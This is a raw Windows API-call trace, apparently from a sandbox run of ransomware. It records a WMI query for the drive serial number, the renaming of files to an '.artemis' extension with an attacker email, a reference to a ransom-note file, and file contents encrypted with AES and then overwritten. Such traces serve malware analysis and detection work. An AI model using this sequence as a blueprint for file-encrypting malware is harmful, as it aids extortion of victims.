[0197.281] WbemLocator:IUnknown:QueryInterface (in: This=0x67481b4, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb08 | out: ppvObject=0x69deb08*=0x780c04) returned 0x0 [0197.281] WbemLocator:IUnknown:QueryInterface (in: This=0x67481b4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb04 | out: ppvObject=0x69deb04*=0x780be4) returned 0x0 [0197.281] WbemLocator:IClientSecurity:SetBlanket (This=0x780be4, pProxy=0x67481b4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0197.281] WbemLocator:IUnknown:Release (This=0x780be4) returned 0x2 [0197.281] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x1 [0197.281] CoTaskMemFree (pv=0x77e118) [0197.281] WbemLocator:IUnknown:Release (This=0x6737078) returned 0x0 [0197.480] WbemLocator:IUnknown:QueryInterface (in: This=0x67481b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de704 | out: ppvObject=0x69de704*=0x780c04) returned 0x0 [0197.480] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de6c0 | out: ppvObject=0x69de6c0*=0x0) returned 0x80004002 [0197.821] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69de4dc | out: ppvObject=0x69de4dc*=0x0) returned 0x80004002 [0197.821] WbemLocator:IUnknown:AddRef (This=0x780c04) returned 0x3 [0197.821] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69de01c | out: ppvObject=0x69de01c*=0x0) returned 0x80004002 [0197.822] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69ddfcc | out: ppvObject=0x69ddfcc*=0x0) returned 0x80004002 [0197.822] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69ddfd8 | out: ppvObject=0x69ddfd8*=0x780b64) returned 0x0 [0197.822] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x780b64, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x69ddfe0 | out: pCid=0x69ddfe0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.822] WbemLocator:IUnknown:Release (This=0x780b64) returned 0x3 [0197.822] CoGetContextToken (in: pToken=0x69de038 | out: pToken=0x69de038) returned 0x0 [0197.822] CoGetContextToken (in: pToken=0x69de440 | out: pToken=0x69de440) returned 0x0 [0197.822] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de4d0 | out: ppvObject=0x69de4d0*=0x780bec) returned 0x0 [0197.822] WbemLocator:IRpcOptions:Query (in: This=0x780bec, pPrx=0x780c04, dwProperty=2, pdwValue=0x69de4f8 | out: pdwValue=0x69de4f8) returned 0x80004002 [0197.822] WbemLocator:IUnknown:Release (This=0x780bec) returned 0x3 [0197.822] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x2 [0197.822] CoGetContextToken (in: pToken=0x69dea18 | out: pToken=0x69dea18) returned 0x0 [0197.823] CoGetContextToken (in: pToken=0x69de978 | out: pToken=0x69de978) returned 0x0 [0197.823] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x69dea48*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x69dea44 | out: ppvObject=0x69dea44*=0x67481b4) returned 0x0 [0197.823] WbemLocator:IUnknown:AddRef (This=0x67481b4) returned 0x4 [0197.823] WbemLocator:IUnknown:Release (This=0x67481b4) returned 0x3 [0197.823] WbemLocator:IUnknown:Release (This=0x67481b4) returned 0x2 [0197.823] SysStringLen (param_1=0x0) returned 0x0 [0197.823] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x69deddc | out: puCount=0x69deddc*=0x0) returned 0x0 [0197.823] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x69dedd8*=0x0, pszText=0x0 | out: puBuffLength=0x69dedd8*=0x20, pszText=0x0) returned 0x0 [0197.823] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x69dedd8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x69dedd8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0197.823] CoGetContextToken (in: pToken=0x69dea48 | out: pToken=0x69dea48) returned 0x0 [0197.823] WbemLocator:IUnknown:AddRef (This=0x780c04) returned 0x3 [0197.823] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de8dc | out: ppvObject=0x69de8dc*=0x780c04) returned 0x0 [0197.823] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x3 [0197.823] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x2 [0197.823] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x69dede0*=0x0, pszText=0x0 | out: puBuffLength=0x69dede0*=0x20, pszText=0x0) returned 0x0 [0197.823] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x69dede0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x69dede0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0197.823] IWbemServices:GetObject (in: This=0x67481b4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x69ded94*=0x0, ppCallResult=0x0 | out: ppObject=0x69ded94*=0x673bac8, ppCallResult=0x0) returned 0x0 [0198.211] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x69ded94 | out: puCount=0x69ded94*=0x2) returned 0x0 [0198.211] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x69ded90*=0x0, pszText=0x0 | out: puBuffLength=0x69ded90*=0xf, pszText=0x0) returned 0x0 [0198.211] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x69ded90*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded90*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.211] IWbemClassObject:Get (in: This=0x673bac8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x69ded90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34640f8*=0, plFlavor=0x34640fc*=0 | out: pVal=0x69ded90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34640f8*=8, plFlavor=0x34640fc*=0) returned 0x0 [0198.211] SysStringByteLen (bstr="9C354B42") returned 0x10 [0198.211] SysStringByteLen (bstr="9C354B42") returned 0x10 [0198.211] IWbemClassObject:Get (in: This=0x673bac8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x69ded98*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34640f8*=8, plFlavor=0x34640fc*=0 | out: pVal=0x69ded98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34640f8*=8, plFlavor=0x34640fc*=0) returned 0x0 [0198.211] SysStringByteLen (bstr="9C354B42") returned 0x10 [0198.212] SysStringByteLen (bstr="9C354B42") returned 0x10 [0198.212] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x69de998, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0198.212] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x69de998, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x76 [0198.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dedf8) returned 1 [0198.212] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x69dee74 | out: lpFileInformation=0x69dee74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x1ca82d60, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x830)) returned 1 [0198.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dedf4) returned 1 [0198.212] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0198.213] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x69dea3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0198.213] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x69dea34, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0198.213] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x69dea3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0198.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dee9c) returned 1 [0198.213] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x69def18 | out: lpFileInformation=0x69def18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe2af0c0, ftCreationTime.dwHighDateTime=0x1d6a20a, ftLastAccessTime.dwLowDateTime=0xfe2af0c0, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xfe393900, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0198.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dee98) returned 1 [0198.213] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x69de9b8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0198.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dee64) returned 1 [0198.214] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x34648bc | out: lpFileInformation=0x34648bc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8)) returned 1 [0198.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dee60) returned 1 [0198.215] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x69de8a4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0198.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69ded98) returned 1 [0198.215] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a4 [0198.215] GetFileType (hFile=0x5a4) returned 0x1 [0198.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69ded94) returned 1 [0198.216] GetFileType (hFile=0x5a4) returned 0x1 [0198.216] GetFileSize (in: hFile=0x5a4, lpFileSizeHigh=0x69deea0 | out: lpFileSizeHigh=0x69deea0*=0x0) returned 0x8f8 [0198.216] ReadFile (in: hFile=0x5a4, lpBuffer=0x34653d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x69dee4c, lpOverlapped=0x0 | out: lpBuffer=0x34653d0*, lpNumberOfBytesRead=0x69dee4c*=0x8f8, lpOverlapped=0x0) returned 1 [0198.218] CloseHandle (hObject=0x5a4) returned 1 [0198.218] CryptAcquireContextW (in: phProv=0x69dedec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x69dedec*=0x7a9178) returned 1 [0198.219] CryptGenRandom (in: hProv=0x7a9178, dwLen=0x10, pbBuffer=0x3466a94 | out: pbBuffer=0x3466a94) returned 1 [0198.744] CryptImportKey (in: hProv=0x7a9178, pbData=0x35a5e7c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x69dedbc | out: phKey=0x69dedbc*=0x77b2b0) returned 1 [0198.744] CryptContextAddRef (hProv=0x7a9178, pdwReserved=0x0, dwFlags=0x0) returned 1 [0198.744] CryptContextAddRef (hProv=0x7a9178, pdwReserved=0x0, dwFlags=0x0) returned 1 [0198.744] CryptDuplicateKey (in: hKey=0x77b2b0, pdwReserved=0x0, dwFlags=0x0, phKey=0x69dedac | out: phKey=0x69dedac*=0x77adf0) returned 1 [0198.744] CryptContextAddRef (hProv=0x7a9178, pdwReserved=0x0, dwFlags=0x0) returned 1 [0198.744] CryptSetKeyParam (hKey=0x77adf0, dwParam=0x4, pbData=0x35a5f5c*=0x1, dwFlags=0x0) returned 1 [0198.744] CryptSetKeyParam (hKey=0x77adf0, dwParam=0x1, pbData=0x35a5f28, dwFlags=0x0) returned 1 [0198.744] CryptEncrypt (in: hKey=0x77adf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x35a5f6c*, pdwDataLen=0x69dee18*=0x900, dwBufLen=0x900 | out: pbData=0x35a5f6c*, pdwDataLen=0x69dee18*=0x900) returned 1 [0198.744] CryptEncrypt (in: hKey=0x77adf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35a6890*, pdwDataLen=0x69dee20*=0x0, dwBufLen=0x10 | out: pbData=0x35a6890*, pdwDataLen=0x69dee20*=0x10) returned 1 [0198.746] CryptDestroyKey (hKey=0x77b2b0) returned 1 [0198.746] CryptReleaseContext (hProv=0x7a9178, dwFlags=0x0) returned 1 [0198.746] CryptReleaseContext (hProv=0x7a9178, dwFlags=0x0) returned 1 [0198.746] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x69de890, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0198.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69ded84) returned 1 [0198.746] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3dc [0198.747] GetFileType (hFile=0x3dc) returned 0x1 [0198.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69ded80) returned 1 [0198.747] GetFileType (hFile=0x3dc) returned 0x1 [0198.747] WriteFile (in: hFile=0x3dc, lpBuffer=0x35acc58*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x69dee14, lpOverlapped=0x0 | out: lpBuffer=0x35acc58*, lpNumberOfBytesWritten=0x69dee14*=0xb10, lpOverlapped=0x0) returned 1 [0198.748] CloseHandle (hObject=0x3dc) returned 1 [0198.749] CoTaskMemAlloc (cb=0x20c) returned 0x9831858 [0198.749] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9831858 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0198.749] CoTaskMemFree (pv=0x9831858) [0198.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x69de878, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0198.749] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69dedc0 | out: ppv=0x69dedc0*=0x72015c) returned 0x0 [0198.750] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x69dedb8 | out: pAptType=0x69dedb8*=1) returned 0x0 [0198.750] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x69dedbc | out: ppvObject=0x69dedbc*=0x0) returned 0x80004002 [0198.750] IUnknown:Release (This=0x72015c) returned 0x1 [0198.751] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69de728 | out: ppv=0x69de728*=0x6737028) returned 0x0 [0198.751] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737028, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69de940 | out: ppvObject=0x69de940*=0x0) returned 0x80004002 [0198.751] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737028, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de954 | out: ppvObject=0x69de954*=0x6738a10) returned 0x0 [0198.751] WbemDefPath:IUnknown:Release (This=0x6737028) returned 0x0 [0198.751] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de574 | out: ppvObject=0x69de574*=0x6738a10) returned 0x0 [0198.751] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de530 | out: ppvObject=0x69de530*=0x0) returned 0x80004002 [0198.751] WbemDefPath:IUnknown:AddRef (This=0x6738a10) returned 0x3 [0198.751] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69dde8c | out: ppvObject=0x69dde8c*=0x0) returned 0x80004002 [0198.751] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69dde3c | out: ppvObject=0x69dde3c*=0x0) returned 0x80004002 [0198.751] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69dde48 | out: ppvObject=0x69dde48*=0x77c138) returned 0x0 [0198.751] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c138, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x69dde50 | out: pCid=0x69dde50*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0198.751] WbemDefPath:IUnknown:Release (This=0x77c138) returned 0x3 [0198.751] CoGetContextToken (in: pToken=0x69ddea8 | out: pToken=0x69ddea8) returned 0x0 [0198.751] CoGetContextToken (in: pToken=0x69de2b0 | out: pToken=0x69de2b0) returned 0x0 [0198.752] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de340 | out: ppvObject=0x69de340*=0x0) returned 0x80004002 [0198.752] WbemDefPath:IUnknown:Release (This=0x6738a10) returned 0x2 [0198.752] WbemDefPath:IUnknown:Release (This=0x6738a10) returned 0x1 [0198.752] CoGetContextToken (in: pToken=0x69dec38 | out: pToken=0x69dec38) returned 0x0 [0198.752] CoGetContextToken (in: pToken=0x69deb98 | out: pToken=0x69deb98) returned 0x0 [0198.752] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x69dec68*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x69dec64 | out: ppvObject=0x69dec64*=0x6738a10) returned 0x0 [0198.752] WbemDefPath:IUnknown:AddRef (This=0x6738a10) returned 0x3 [0198.752] WbemDefPath:IUnknown:Release (This=0x6738a10) returned 0x2 [0198.752] WbemDefPath:IWbemPath:SetText (This=0x6738a10, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.752] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a10, puCount=0x69dedec | out: puCount=0x69dedec*=0x0) returned 0x0 [0198.752] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x69dede8*=0x0, pszText=0x0 | out: puBuffLength=0x69dede8*=0x20, pszText=0x0) returned 0x0 [0198.752] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x69dede8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x69dede8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.752] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738a10, uRequestedInfo=0x0, puResponse=0x69dedf4 | out: puResponse=0x69dedf4*=0xc19) returned 0x0 [0198.752] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a10, puCount=0x69dedec | out: puCount=0x69dedec*=0x0) returned 0x0 [0198.752] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738a10, uRequestedInfo=0x0, puResponse=0x69dedf4 | out: puResponse=0x69dedf4*=0xc19) returned 0x0 [0198.752] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738a10, uRequestedInfo=0x0, puResponse=0x69dedf4 | out: puResponse=0x69dedf4*=0xc19) returned 0x0 [0198.752] 